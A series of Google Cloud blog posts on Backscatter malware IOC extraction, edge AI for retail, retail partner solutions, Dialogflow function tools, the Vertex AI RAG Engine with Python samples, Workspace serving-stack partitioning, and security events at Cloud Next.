The ability to quickly detect and respond to threats has a significant impact on potential outcomes. Indicators of compromise (IOCs) serve as crucial breadcrumbs, allowing cybersecurity teams to identify and mitigate potential attacks while expanding their search for related activity. VirusTotal’s existing suite of tools to analyze and understand malware IOCs, and thus the Google Threat Intelligence platform by extension, is further enhanced with Backscatter.
VirusTotal has traditionally utilized dynamic analysis methods, like sandboxes, to observe malware behavior and capture IOCs. However, these methods can be time-consuming and may not yield actionable data if the malware employs anti-analysis techniques. Backscatter, a service developed by the Mandiant FLARE team, complements these methods by offering a static analysis capability that directly examines malware without executing it, leading to faster and more efficient IOC collection and high-confidence malware family identification. Additionally, Backscatter is capable of analyzing sandbox artifacts, including memory dumps, to improve support for packed and obfuscated malware that does successfully execute in dynamic environments.
Within the Google Threat Intelligence platform, Backscatter shines by identifying configuration data, embedded IOCs, and other malicious artifacts hidden within malware uploaded by users. It can pinpoint command-and-control (C2 or C&C) servers, dropped files, and other signs of malware presence, rapidly generating actionable threat intelligence. All of the extracted IOCs and configuration attributes become immediately pivotable in the Google Threat Intelligence platform, allowing users to identify additional malware related to that threat actor or activity.
Complementing Dynamic Analysis
Backscatter enables security teams to quickly understand and defend against attacks. By leveraging Backscatter’s extracted IOCs in conjunction with static, dynamic, and reputational data, analysts gain a more comprehensive view of potential threats, enabling them to block malicious communication, detect and remove dropped files, and ultimately neutralize attacks.
Backscatter’s static analysis approach, available in Google Threat Intelligence, provides a valuable addition to the platform’s existing dynamic analysis capabilities. This combination offers a more comprehensive threat intelligence strategy, allowing users to leverage the strengths of both approaches for a more robust security posture.
Backscatter in GTI and VirusTotal
Backscatter is available to Google SecOps customers, including users of VirusTotal Enterprise and the Google Threat Intelligence platform that supersedes it. While detecting a file as malicious can be useful, more clarity about the specific threat provides defenders with actionable intelligence. By providing a higher-confidence attribution to a malware family, capabilities and behaviors can be approximated from previous reporting without requiring manual analysis.
Embedded data such as C2 servers, campaign identifiers, file paths, and registry keys can provide analysts with additional contextual information around a specific event. Google Threat Intelligence helps link that event to related activity by providing pivots to related IOCs, reports, and threat actor profiles. This additional context allows defenders to search their environment and expand remediation efforts.
By taking a static approach to extracting data from malware, Backscatter is able to handle files targeting different environments, operating systems, and execution mechanisms. For example, a DONUT malware sample that is x86 shellcode could not be executed directly by a sandbox, yet its data can still be extracted statically.
Backscatter in the Field
Mandiant Managed Defense leverages Backscatter to deliver faster and more accurate identification and analysis of rapidly emerging malware families. This enables them to more quickly scope threat activity and more rapidly provide customers with pertinent contextual information. From distribution campaigns providing initial access, to ransomware operations, to targeted attacks by state-sponsored actors, Backscatter aims to provide actionable threat intelligence to enable security teams and protect customers.
One example threat group is UNC2500, which primarily distributes malware via email attachments and links to compromised websites. Many of the malware families used by this group, such as QAKBOT and DARKGATE, are supported by Backscatter, allowing Managed Defense customers to proactively block IOCs extracted by Backscatter.
Looking Ahead
Backscatter stands as a testament to Google SecOps’ commitment to providing cutting-edge tools for combating cyber threats. By offering a fast and efficient way to extract IOCs through static analysis, Backscatter empowers security teams to stay one step ahead of attackers. Incorporating Backscatter into their workflow, Google Threat Intelligence customers can strengthen their cybersecurity defenses and safeguard their valuable assets.
For retailers, making intelligent, data-driven decisions in real-time isn’t an advantage — it’s a necessity. Staying ahead of the curve means embracing AI, but many retailers hesitate to adopt because it’s costly to overhaul their technology. While traditional AI implementations may require significant upfront investments, retailers can leverage existing assets to harness the power of AI.
These assets, ranging from security cameras to point-of-sale systems, can unlock store analytics, faster transactions, staff enablement, loss prevention, and personalization — all without straining the budget. In this post, we’ll explore how inference at the edge, a technique that runs AI-optimized applications on local devices without relying on distant cloud servers, can transform retail assets into powerful tools.
How retailers can build an AI foundation
Retailers can find assets to fuel their AI in all corners of the business. You can unlock employee productivity by transforming your vast repository of handbooks, training materials, and operational procedures into working assets for AI.
Digitized manuals for store equipment, human resources, loss prevention, and domain-specific information can also be combined with agent-based AI assistants to provide contextually aware “next action assistants”. By extending AI-optimized applications from the cloud to the edge, retail associates can now ask their AI assistant, “What do I do next?” and get a detailed, fast response tailored to their question.
Edge processing power decision point: CPU vs GPU
Next, we’ll explore the critical decision of choosing the right hardware to power your applications. The two primary options are CPUs (Central Processing Units) and GPUs (Graphics Processing Units), each with its own strengths and weaknesses. Making an informed choice requires understanding your specific use cases and balancing performance requirements, bandwidth, and model processing with cost considerations. Use the decision matrix below to guide your decision-making process, especially when choosing between deploying at a regional data center (DC) or at the edge.
Decision matrix:

| Feature | CPU | GPU | Use cases (examples) |
| --- | --- | --- | --- |
| Cost | Lower | Higher | Basic analytics, people counting, simple object detection |
| Performance | Required; Good for general-purpose tasks | Optional; Good for parallel processing | Complex AI, video analytics, high-resolution image processing, ML model training |
| Power consumption | Lower | Higher | Remote locations, small form-factor devices |
| Latency | Moderate | Lower (for parallel tasks) | Real-time applications, immediate insights |
| Deployment location | Edge or Regional DC | Typically Edge, but feasible in Regional DC | Determined by latency, bandwidth, and data processing needs |
Key decision criteria for retail decision makers
Complexity of AI models: AI models focused on retail use cases, like basic object detection, can often run efficiently on CPUs. More complex models, such as those used for real-time video analytics or personalized recommendations over large datasets, typically require the parallel processing power of GPUs.
Data volume and velocity: If you’re processing large amounts of data at high speed, a GPU may be necessary to keep up with the demand. For smaller datasets and lower throughput, a CPU may suffice.
Latency requirements: For use cases requiring ultra-low latency, such as real-time fraud detection, GPUs can provide faster processing, especially when located at the edge, closer to the data source. However, network latency between the edge and a regional DC might negate this benefit if the GPU is located regionally.
Budget: GPUs usually have a higher price tag than CPUs. Carefully consider your budget and the potential ROI of investing in GPU-powered solutions before making a decision. Start with CPU-based solutions where possible and upgrade to GPUs only when absolutely necessary.
Power consumption: GPUs generally consume more power than CPUs. This is an important factor to consider for edge deployments, especially in locations with limited power availability. This is less of a concern if deploying at a regional DC where power and cooling are centralized.
Deployment location: The proximity of the processing power to the data source has major implications for latency. Deploying at the edge (in-store) minimizes latency for real-time use cases. Regional DCs introduce network latency, making them less suitable for applications requiring immediate action. However, certain tasks requiring heavy compute but not low latency (e.g., nightly inventory analysis) might be better suited for a regional DC where resources can be pooled and managed centrally.
Remember, not all AI and ML require new investments in emerging technology. Many AI/ML-based use cases can produce the desired outcome without using a GPU. For example, consider the visual inspection for store analytics and fast checkout referenced in the Google Distributed Cloud Price-a-Tray interactive game. Inference is performed at 5 FPS, while the video stream continues to run at 25 FPS. The bounding boxes are then drawn on top of the returned detections rather than having one system handle the video stream, detection, and bounding boxes, as sketched below. This enables more efficient use of the CPU, since many of the actions in this example can be split across cores and threads.
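A hedged sketch of that pattern in browser JavaScript: the video and overlay render at full frame rate, detection runs on a slower timer, and the most recent boxes are redrawn on every frame. Here, detectObjects() is a placeholder for whatever CPU-friendly model call you use.

// Run inference at ~5 FPS while the video and overlay render at full speed.
const video = document.querySelector('video');
const canvas = document.querySelector('canvas');
const ctx = canvas.getContext('2d');

let latestBoxes = []; // most recent detections, reused across frames

// Slow path: call the (placeholder) detector every 200 ms (~5 FPS).
setInterval(async () => {
  latestBoxes = await detectObjects(video); // placeholder inference call
}, 200);

// Fast path: draw the video and the last known boxes on every animation frame.
function render() {
  ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
  ctx.strokeStyle = 'lime';
  for (const box of latestBoxes) {
    ctx.strokeRect(box.x, box.y, box.width, box.height);
  }
  requestAnimationFrame(render);
}
requestAnimationFrame(render);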
But there are cases when GPUs do make sense. When very high precision is required, GPUs are often needed, as the drop in fidelity from quantizing a model may reduce quality beyond acceptable thresholds. In the example of tracking an item, if millimeter-level movement accuracy is required, 5 FPS would not be sufficient for a reasonably fast-moving item, and a GPU would likely be required.
There is a middle ground between GPUs and CPUs: the world of specialty accelerators. Accelerators come in the form of peripherals attached to a system or as special instruction sets on a CPU. CPUs are now being manufactured with advanced matrix multiplication capabilities that assist tensor manipulation on-chip, greatly improving the performance of ML and AI models. One concrete example is running models compiled for OpenVINO. In addition, Google Distributed Cloud (GDC) Server and Rack editions utilize Intel Core processors, an architecture designed to be more flexible, supporting matrix math that improves the performance of ML models on CPU compared with traditional model serving.
Bring AI to your business
By tapping into the power of existing infrastructure and deploying AI at the edge, retailers can deliver modern customer experiences, streamline operations, and unlock employee productivity.
Google Cloud’s mission is to accelerate every organization’s ability to digitally transform its business and industry — and a key part of doing that is with our ISV and service partners, who possess critical industry knowledge and technical expertise. To provide customers with the most advanced ecosystem of solutions across industries, we’ve enabled these partners to easily build and scale products on our platform. Many are deeply engaged with our AI technology to deliver new and novel AI solutions directly to our customers and theirs.
Today, at the annual National Retail Federation (NRF) conference, we wanted to highlight more than 20 ISV and services partners that are utilizing Vertex AI, Gemini models, and other Google Cloud technologies to empower retail businesses with the tools they need to transform how employees work and shoppers engage with their brands.
At NRF, we’re excited to showcase the breadth of our ecosystem of retail partners and spotlight the ways they are enabling customer success using technology from Google Cloud.
Transforming marketing with AI-powered data
AI is helping retailers get significantly more value from business data, enabling them to create personalized campaigns at scale, increase ROI with data-driven insights, and build more predictive and advanced audience segments. Partners are using Vertex AI, Gemini models, and BigQuery to let customers unlock the true potential of their data to optimize revenue and more effectively grow their businesses.
Eagle Eye delivers its AI-powered omnichannel personalization solution, built on Vertex AI, with built-for-retail algorithms to generate personalized promotions at scale that drive loyalty and customer engagement across channels.
LiveRamp provides a data collaboration platform that allows companies to enrich, activate, and analyze customer data while protecting brand and consumer trust.
Revieve offers multiple solutions tailored for beauty retailers and brands that provide real-time consumer interactions, next gen AI, conversational AI, and data-informed product discovery.
Revionics’ price optimization suite utilizes Gemini and Vertex AI to power conversational analytics that enable customers to engage with their retail data using natural language search, such as “which competitor changes prices most frequently” and “which products are priced higher than competitors.”
Optimizing unified commerce experiences
Unified commerce experiences equip retailers with a more holistic view of front- and back-end systems to have complete visibility of the customer, inventory, and orders across all retail channels. With Google Cloud technology like BigQuery and embedded ML, partners are helping customers enhance decision-making processes and create stronger brand loyalty and revenue growth.
BigCommerce uses Google Cloud AI within BigAI Product Recommendations, which enables brands to offer shoppers real-time, personalized recommendations and can boost conversion and average order value.
Bloomreach uniquely integrates customer and product data within its real-time AI solution, enabling more personalized marketing, product discovery, advertising content, and conversational shopping experiences.
commercetools is a global leader in composable commerce and empowers businesses to customize, scale, and optimize shopping experiences with solutions that help retailers reduce risks and costs, and expand growth through exceptional customer experiences.
Everseen Vision AI platform and applications reduce retail shrink, improve inventory accuracy, enhance customer service, and provide data-driven insights, contributing to retailers’ ROI and a streamlined shopping experience.
Quantum Metric provides a digital analytics platform that enables businesses to more easily monitor, troubleshoot, and optimize their customers’ digital journeys while leveraging gen AI to enhance user retention, conversion rates, and much more.
Shopify is the leading global commerce company with a platform engineered for speed, customization, reliability, and security for businesses of any size, and a better experience for consumers everywhere they shop.
Creating sustainable supply chains
AI-powered tools for supply chains and logistics are enabling retailers to drive more sustainable and efficient operations, scale automation, and reduce their carbon footprint across the entire value chain. Partners are leveraging Vertex AI and BigQuery to extend these capabilities to retailers, with industry-leading analytics and predictive capabilities that can help optimize business performance.
345 Global is a cloud-based platform that enables customers to optimize store planning, merchandising, sales, and marketing functions within a single, integrated solution.
Impact Analytics helps retailers and consumer goods businesses make better decisions and improve profitability with a platform that uses predictive analytics and machine learning to optimize various aspects, such as forecasting demand, managing supply chains, and enhancing merchandise planning, pricing, and promotions.
Manhattan empowers retailers to unify point of sale, order management, inventory, fulfillment, and customer service with supply chain execution — optimizing operations, enabling real-time decisions, and driving growth.
o9 Solutions unlocks measurable results by transforming disconnected planning processes, reducing value leakage, and enabling smarter, integrated, and more efficient planning decisions.
Enhancing physical store operations
Physical stores and in-person shopping experiences remain vital to retailers. AI is helping these businesses improve how they operate in a variety of ways, whether it’s enhancing how merchandising assistants support customer requests or deploying machine vision to detect and resolve low-inventory challenges.
NCR Voyix enables retailers to deliver a seamless and personalized omnichannel shopping experience while providing real-time, data-driven insights into shopper behavior and store performance, which helps optimize operations and supports long-term growth.
Standard.ai offers solutions that let retailers optimize performance through computer vision with capabilities, such as multi-camera tracking to enable high-resolution understanding of shopper behaviors and store performance.
VusionGroup helps retailers maximize efficiency and improve store performance with solutions that can optimize critical functions, such as intelligent pricing and promotions, real-time shelf monitoring, in-store digital advertising, and more.
Zebra offers new integrated hardware and software solutions that leverage AI and machine learning to help retailers transform workflows through improved inventory, connected frontline workers, and intelligent automation.
Enabling customer success with services partners
Google Cloud relies on its services partners to provide customers with the expertise and support needed to plan, deploy, and optimize AI projects. Many of these partners have launched services specifically for retailers and are continuing to demonstrate their proven ability to help customers transform with AI and other Google Cloud technology at NRF.
Accenture and its ai.RETAIL solution provide customers with the technology needed to transform operations, deploying AI and edge computing to improve consumer experiences, personalize marketing, enhance employee productivity, and more.
Deloitte offers a real-time Associate Productivity solution for intelligent task management and improving in-store operations, a Demand Planning solution to enhance inventory productivity and on-shelf availability, and a Customer Data Enrichment solution for better customer insights and personalized marketing.
Publicis Sapient applies Google Cloud AI for its Content Supply Chain offering, which helps businesses optimize the content lifecycle, and its Retail Media Accelerator, which enables retailers to identify new revenue streams and increase ROI throughout the marketing lifecycle.
Tredence brings unified data models and AI/ML accelerators together with its gen AI-powered Category Performance Advisor, which provides real-time prescriptive recommendations for retail organizations to stay ahead of market trends, improve efficiency, and drive measurable growth.
Slalom provides retail businesses with a multimodal AI discovery solution that uses BigQuery, Vertex AI, and Gemini to help customers solve product discovery challenges and initiate automated workflows for delivery and warranty information.
If you have a website, it’s table stakes to build engaging experiences that are effective at retaining existing customers, and attracting new ones. Users want tailored content, but traditional website development tools struggle to keep up with the demand for dynamic, individualized journeys. With Google Gemini and Conversational Agents (Dialogflow CX), you can now build websites that dynamically adapt their content based on what your users are looking for.
In this blog post, you will learn how to:
Create dynamic web pages that respond to users’ intents using Conversational Agents
Use function tools to bridge the gap between conversation intent and web content display
What is a Conversational Agents function tool?
A Conversational Agent function tool is a feature that allows your chatbot to interact with external systems and trigger actions based on user conversations. In this article, we use it to:
Detect user intents from natural language input
Map those intents to specific function tools
Dynamically update the UI based on the conversation flow
Let’s take an example: Retail chatbot
While everyone can benefit from these features, retailers in particular can benefit from building dynamic web pages with Conversational Agents. We’ll use a retail chatbot use case to demonstrate this tool. Here’s the workflow:
Step 1: Create a function tool
Set up a new Playbook function tool called Load-Swag-Content with the following input/output schemas in YAML format.
# Input format
properties:
  url:
    type: string
    description: the URL for the Swag
required:
  - url
type: object

# Output format
null
Your console should look something like this:
Step 2: Set up a playbook steering agent
Set up a main steering playbook to call the function tool Load-Swag-Content.
Step 3: Create examples to drive Playbook agent behavior.
In this example, when a user asks about “Backpack”, the Playbook agent will call the function tool by passing a backpack-related URL as an argument to the web client.
More information on the web client in the next step.
Step 4: Write web client JavaScript function
This client-side JavaScript function receives the URL from the Load-Swag-Content function tool and updates the HTML iframe accordingly.
We are using an HTML iframe to demonstrate the function-calling and parameter-passing capabilities. The same concept works across different web frameworks and applications, and developers can be as creative as they like when building custom logic.
Step 5: Register the function tool
Register the Playbook function tool using registerClientSideFunction, which will map the Load-Swag-Content tool with the JavaScript function loadURL.
This is front-end sample code; you need to update configuration values such as YOUR_REGION, YOUR_PROJECT_ID, YOUR_AGENT_ID, and YOUR_TOOL_ID, as well as your custom JavaScript function.
Let’s look at a demo use case for a virtual swag assistant. The customer is greeted at the start of the chat.
When the customer wants to find out more about a Fleece Jacket, the page is dynamically updated to display relevant information.
Next steps
To learn more about Conversational Agent Function tools, check out the following resources and enhance your customer experience with real-time intent-based dynamic web pages.
Get started with Conversational Agent by following the tutorial here
Closing the gap between impressive model demos and real-world performance is crucial for successfully deploying generative AI in the enterprise. Despite the technology’s incredible capabilities, this perceived gap can be a barrier for many developers and enterprises trying to “productionize” AI. This is where retrieval-augmented generation (RAG) becomes non-negotiable: it strengthens your enterprise applications by building trust in their AI outputs.
Today, we’re sharing the general availability of Vertex AI RAG Engine, a fully managed service that helps you build and deploy RAG implementations with your data and methods. With Vertex AI RAG Engine, you can:
Adapt to any architecture: Choose the models, vector databases, and data sources that work best for your use case. This flexibility ensures RAG Engine fits into your existing infrastructure rather than forcing you to adapt to it.
Evolve with your use case: Adding new data sources, updating models, or adjusting retrieval parameters happens through simple configuration changes. The system grows with you, maintaining consistency while accommodating new requirements.
Evaluate in simple steps: Set up multiple RAG engines with different configurations to find what works best for your use case.
Introducing Vertex AI RAG Engine
Vertex AI RAG Engine is a managed service that lets you build and deploy RAG implementations with your data and methods. Think of it as having a team of experts who have already solved complex infrastructure challenges such as efficient vector storage, intelligent chunking, optimal retrieval strategies, and precise augmentation — all while giving you the controls to customize for your specific use case.
Vertex AI’s RAG Engine offers a vibrant ecosystem with a range of options catering to diverse needs.
DIY capabilities: DIY RAG empowers users to tailor their solutions by mixing and matching different components. It works well for low- to medium-complexity use cases, with an easy-to-get-started API that enables fast experimentation, proofs of concept, and RAG-based applications with a few clicks.
Search functionality: Vertex AI Search stands out as a robust, fully managed solution. It supports a wide variety of use cases, from simple to complex, with high out-of-the-box quality, ease of getting started, and minimal maintenance.
Connectors: A rapidly growing list of connectors helps you quickly connect to various data sources, including Cloud Storage, Google Drive, Jira, Slack, or local files. RAG Engine handles the ingestion process (even for multiple sources) through an intuitive interface.
Customization
One of the defining strengths of Vertex AI’s RAG Engine is its capacity for customization. This flexibility allows you to fine-tune various components to perfectly align with your data and use case.
Parsing: When documents are ingested into an index, they are split into chunks. RAG Engine lets you tune chunk size and chunk overlap, and offers different strategies to support different types of documents (see the sketch after this list).
Retrieval: You might already be using Pinecone, or perhaps you prefer the open-source capabilities of Weaviate, or maybe you want to leverage Vertex AI Vector Search. RAG Engine works with your choice or, if you prefer, can manage the vector storage entirely for you. This flexibility ensures you’re never locked into a single approach as your needs evolve.
Generation: You can choose from hundreds of LLMs in Vertex AI Model Garden, including Google’s Gemini, Llama and Claude.
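To make the parsing controls concrete, here is a minimal sketch of corpus creation and ingestion with tuned chunking. It assumes the vertexai.preview.rag API accepts chunk_size and chunk_overlap arguments on import_files; the project, display name, and Cloud Storage path are hypothetical placeholders.
from vertexai.preview import rag
import vertexai

# Hypothetical project and location placeholders.
vertexai.init(project="PROJECT_ID", location="us-central1")

# Create a corpus to hold the ingested, chunked documents.
corpus = rag.create_corpus(display_name="product-docs")

# Ingest files from a (hypothetical) Cloud Storage path, tuning how each
# document is split into chunks before indexing.
rag.import_files(
    corpus.name,
    ["gs://my-bucket/docs/"],
    chunk_size=512,      # tokens per chunk
    chunk_overlap=100,   # tokens shared between consecutive chunks
)
Smaller chunks tend to improve precision for pointed questions, while larger chunks preserve more context; the overlap helps avoid splitting an answer across a chunk boundary.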
Use Vertex AI RAG as a tool in Gemini
Vertex AI’s RAG Engine is natively integrated with the Gemini API as a tool. You can create grounded conversations that use RAG to provide contextually relevant answers. Simply initialize a RAG retrieval tool, configured with specific settings such as the number of documents to retrieve and whether to use an LLM-based ranker, and pass the tool to a Gemini model.
from vertexai.preview import rag
from vertexai.preview.generative_models import GenerativeModel, Tool
import vertexai

PROJECT_ID = "PROJECT_ID"
CORPUS_NAME = "projects/{PROJECT_ID}/locations/LOCATION/ragCorpora/RAG_CORPUS_RESOURCE"
MODEL_NAME = "MODEL_NAME"

# Initialize Vertex AI API once per session
vertexai.init(project=PROJECT_ID, location="LOCATION")

config = vertexai.preview.rag.RagRetrievalConfig(
    top_k=10,
    ranking=rag.Ranking(
        llm_ranker=rag.LlmRanker(
            model_name=MODEL_NAME
        )
    )
)

rag_retrieval_tool = Tool.from_retrieval(
    retrieval=rag.Retrieval(
        source=rag.VertexRagStore(
            rag_resources=[
                rag.RagResource(
                    rag_corpus=CORPUS_NAME,
                )
            ],
            rag_retrieval_config=config
        ),
    )
)

rag_model = GenerativeModel(
    model_name=MODEL_NAME, tools=[rag_retrieval_tool]
)
response = rag_model.generate_content("Why is the sky blue?")
print(response.text)
# Example response:
# The sky appears blue due to a phenomenon called Rayleigh scattering.
# Sunlight, which contains all colors of the rainbow, is scattered
# by the tiny particles in the Earth's atmosphere....
# ...
Use Vertex AI Search as a retriever:
Vertex AI Search provides a solution for retrieving and managing data within your Vertex AI RAG applications. By using Vertex AI Search as your retrieval backend, you can improve performance, scalability, and ease of integration.
Enhanced performance and scalability: Vertex AI Search is designed to handle large volumes of data with exceptionally low latency. This translates to faster response times and improved performance for your RAG applications, especially when dealing with complex or extensive knowledge bases.
Simplified data management: Import your data from various sources, such as websites, BigQuery datasets, and Cloud Storage buckets, streamlining your data ingestion process.
Seamless integration: Vertex AI provides built-in integration with Vertex AI Search, which lets you select Vertex AI Search as the corpus backend for your RAG application. This simplifies the integration process and helps to ensure optimal compatibility between components.
Improved LLM output quality: By using the retrieval capabilities of Vertex AI Search, you can help to ensure that your RAG application retrieves the most relevant information from your corpus, which leads to more accurate and informative LLM-generated outputs.
from vertexai.preview import rag
import vertexai

PROJECT_ID = "PROJECT_ID"
DISPLAY_NAME = "DISPLAY_NAME"
ENGINE_NAME = "ENGINE_NAME"

# Initialize Vertex AI API once per session
vertexai.init(project=PROJECT_ID, location="us-central1")

# Create a corpus
vertex_ai_search_config = rag.VertexAiSearchConfig(
    serving_config=f"{ENGINE_NAME}/servingConfigs/default_search",
)

rag_corpus = rag.create_corpus(
    display_name=DISPLAY_NAME,
    vertex_ai_search_config=vertex_ai_search_config,
)

# Check the corpus just created
new_corpus = rag.get_corpus(name=rag_corpus.name)
print(new_corpus)
Cloud applications like Google Workspace provide benefits such as collaboration, availability, security, and cost-efficiency. However, for cloud application developers, there’s a fundamental conflict between achieving high availability and the constant evolution of cloud applications. Changes to the application, such as new code, configuration updates, or infrastructure rearrangements, can introduce bugs and lead to outages. These risks pose a challenge for developers, who must balance stability and innovation while minimizing disruption to users.
Here on the Google Workspace Site Reliability Engineering team, we once moved a replica of Google Docs to a new data center because we needed extra capacity. But moving the associated data, which was vast, overloaded a key index in our database, restricting users’ ability to create new docs. Thankfully, we were able to identify the root cause and mitigate the problem quickly. Still, this experience convinced us of the need to reduce the risk of a global outage from a simple application change.
Limit the blast radius
Our approach to reducing the risk of global outages is to limit the “blast radius,” or extent, of an outage by vertically partitioning the serving stack. The basic idea is to run isolated instances (“partitions”) of application servers and storage (Figure 1). Each partition contains all the various servers necessary to service a user request from end to end. Each production partition also has a pseudo-random mix of users and workloads, so all the partitions have similar resource needs. When it comes time to make changes to the application code, we deploy new changes to one partition at a time. Bad changes may cause a partition-wide outage, but we are protected from a global application outage.
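As an illustration of the idea rather than the production implementation, here is a minimal sketch of sticky, pseudo-random partition assignment in Python: hashing a stable user ID means a given user always lands in the same partition, so a change rolled out to one partition only ever touches that slice of users. The partition count and user ID are hypothetical.
import hashlib

NUM_PARTITIONS = 16  # hypothetical; sized so each partition keeps spare capacity

def partition_for(user_id: str) -> int:
    """Sticky, pseudo-random assignment: the same user always maps to the same partition."""
    digest = hashlib.sha256(user_id.encode("utf-8")).digest()
    return int.from_bytes(digest[:8], "big") % NUM_PARTITIONS

# A rollout then proceeds partition by partition: deploy to partition 0,
# verify health, and only then continue to partitions 1, 2, and so on.
print(partition_for("alice@example.com"))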
Compare this approach to using canarying alone, in which new features or code changes are released to a small group of users before rolling them out to the rest. While canarying deploys changes first to just a few servers, it doesn’t prevent problems from spreading. For example, we’ve had incidents where canaried changes corrupted data used by all the servers in the deployment. With partitioning, the effects of bad changes are isolated to a single partition, preventing such contagion. Of course, in practice, we combine both techniques: canarying new changes to a few servers within a single partition.
Benefits of partitioning
Broadly speaking, partitioning brings a lot of advantages:
Availability: Initially, the primary motivation for partitioning was to improve the availability of our services and avoid global outages. In a global outage, an entire service may be down (e.g., users cannot log into Gmail), or a critical user journey may be broken (e.g., users cannot create Calendar events) — obviously things to be avoided.
Still, the reliability benefits of partitioning can be hard to quantify; global outages are relatively infrequent, so if you don’t have one for a while, it may be due to partitioning, or may be due to luck. That said, we’ve had several outages that were confined to a single partition, and believe they would have expanded into global outages without it.
Flexibility: We evaluate many changes to our systems by experimenting with data. Many user-facing experiments, such as a change to a UI element, use discrete groups of users. For example, in Gmail we can choose an on-disk layout that stores the message bodies of emails inline with the message metadata, or a layout that separates them into different disk files. The right decision depends on subtle aspects of the workload. For example, separating message metadata and bodies may reduce latency for some user interactions, but requires more compute resources in our backend servers to perform joins between the body and metadata columns. With partitioning, we can easily evaluate the impact of these choices in contained, isolated environments.
Data location: Google Workspace lets enterprise customers specify that their data be stored in a specific jurisdiction. In our previous, non-partitioned architecture, such guarantees were difficult to provide, especially since services were designed to be globally replicated to reduce latency and take advantage of available capacity.
Challenges
Despite the benefits, there are some challenges to adopting partitioning. In some cases, these challenges make it hard or risky to move from a non-partitioned to a partitioned setup. In other cases, challenges persist even after partitioning. Here are the issues as we see them:
Not all data models are easy to partition: For example, Google Chat needs to assign both users and chat rooms to partitions. Ideally, a chat and its members would be in a single partition to avoid cross-partition traffic. However, in practice, this is difficult to accomplish. Chat rooms and users form a graph, with users in many chat rooms and chat rooms containing many users. In the worst case, this graph may have only a single connected component spanning all users and chat rooms. If we were to slice the graph into partitions, we could not guarantee that all users would be in the same partition as their chat rooms.
Partitioning a live service requires care: Most of our services pre-date partitioning. As a result, adopting partitioning means taking a live service and changing its routing and storage setup. Even if the end goal is higher reliability, making these kinds of changes in a live system is often the source of outages, and can be risky.
Partition misalignment between services: Our services often communicate with each other. For example, if a new person is added to a Calendar event, Calendar servers make a Remote Procedure Call (RPC) to Gmail delivery servers to send the new invitee an email notification. Similarly, Calendar events with video call links require Calendar to talk to Meet servers for a meeting ID. Ideally, we would get the benefits of partitioning even across services. However, aligning partitions between services is difficult. The main reason is that different services tend to use different entity types when determining which partition to use. For example, Calendar partitions on the owner of the calendar while Meet partitions on meeting ID. The result is that there is no clear mapping from partitions in one service to another.
Partitions are smaller than the service: A modern cloud application is served by hundreds or thousands of servers. We run servers at less than full utilization so that we can tolerate spikes in traffic, and because servers that are saturated with traffic generally perform poorly. If we have 500 servers, and target each at 60% CPU utilization, we effectively have 200 spare servers to absorb load spikes. Because we do not fail over between partitions, each partition has access to a much smaller amount of spare capacity. In a non-partitioned setup, a few server crashes will likely go unnoticed, since there is enough headroom to absorb the lost capacity. But in a smaller partition, these crashes may account for a non-trivial portion of the available server capacity, and the remaining servers may become overloaded.
Key takeaways
We can improve the availability of web applications by partitioning their serving stacks. These partitions are isolated, because we do not fail over between them. Users and entities are assigned to partitions in a sticky manner, which lets us roll out changes in order of risk tolerance, one partition at a time, with confidence that bad changes will only affect a single partition, ideally one that contains only users from your own organization.
In short, partitioning supports our efforts to provide stronger and more reliable services to our users, and it might apply to your service as well. For example, you can improve the availability of your application by using Spanner, which provides geo-partitioning out of the box. Read more about geo-partitioning best practices here.
Few things are more critical to IT operations than security. Security incidents, coordinated threat actors, and regulatory mandates come coupled with the imperative to manage risk effectively and the vital business task of rolling out generative AI. That’s why at Google Cloud Next in 2025 we are creating an in-depth security experience to show you all the ways you can make Google part of your security team and advance your innovation agenda with confidence.
Let’s see why Google Cloud Next is shaping up to be a must-attend event for security experts and the security-curious alike.
What’s in store for you
Here are some of the opportunities you’ll have to interact with Google’s security experts and security technology:
Our massive Security Lounge, a dedicated area of the expo where you can meet the security leaders engineering Google Cloud’s secure by design platform and products, and experience product demos spanning Google Cloud’s security portfolio. Get all your burning product questions answered and provide direct input to the teams who build them.
An interactive Security Operations Center to experience the power of Google Security Operations from the eyes of both defender and adversary. See first-hand how Google equips cybersecurity teams with the data, AI, and scalable analytics to detect and remediate today’s most sophisticated attacks.
At the Mandiant Threat Space, you’ll be able to hear and learn directly from frontline defenders and incident responders who battle advanced threats and defend critical infrastructure around the world.
The Securing AI experience demonstrates how Google Cloud products and expertise can help you manage AI risk, from creation to consumption: inventory your AI assets, safeguard your AI systems, and respond to threats.
Our Capture the Flag challenge, where you can test and hone your cybersecurity skills. This exercise will use real-world data, including Cybersecurity and Infrastructure Security Agency (CISA) advisories, ransom notes, and information from the dark web, to simulate a real-world threat hunt. Navigate clues, analyze evidence, and solve puzzles to capture the flags and best the competition.
Security tabletop exercises where participants role-play and analyze aspects of a hypothetical but realistic cybersecurity incident, such as a data breach or ransomware attack. Gain insight into how your organization is likely to perform during incidents before they happen and learn best practices for handling these incredibly challenging situations that you can take back to your organization.
Birds of a Feather sessions for insightful discussions on key cloud security topics. These are unique opportunities to connect with peers, share your cybersecurity expertise and solve problems with the help of the Google Cloud Security community.
Security breakout sessions
If you’ve attended Next in the past, you know that breakouts are also core to our program. We’ll have more than 40 security breakout sessions covering today’s pressing security topics including cloud security and governance, frontline threat intelligence, enterprise compliance and resilience, AI risk management, and incident response.
Here’s a sneak peek at some of the key breakout sessions on the agenda:
Securing your AI deployments, from creation to consumption: Learn how to build secure AI systems from the ground up and protect your AI models from attacks.
Route, reduce, redact: Managing your security data pipeline: Dive into the new data pipeline management capabilities of Google SecOps and learn how to transform security data to manage scale, reduce costs, and satisfy compliance mandates.
Got identity? Learn to love IAM: Master Identity and Access Management (IAM) to control access to your cloud resources and prevent unauthorized access.
Stop data exfiltration with cloud-first security controls: Discover how to prevent sensitive data from leaving your organization’s control.
Unlocking OT security: Threat intelligence for critical industries: Learn how advanced threat intelligence enables organizations to move from reactive to proactive defense strategies.
AI security and APIs: Addressing the OWASP top 10 LLM and API risks: Understand the top security risks for large language models (LLMs) and APIs, and learn how to mitigate them.
Strengthen cloud security posture, detect threats, and mitigate risks with Security Command Center: Use Google Cloud’s Security Command Center to gain comprehensive visibility into your security posture and respond to threats effectively.
Best practices for SIEM migration and ditching dinosaurs: In this panel, experts will share insights and best practices from their own SIEM migration journeys.
Keep AI secrets safe with Confidential Computing: Explore confidential computing techniques to protect your sensitive data and AI models in use.
Protect Internet-facing web, API, and gen AI services from attacks: Secure your web applications, APIs, and generative AI services from a wide range of threats.
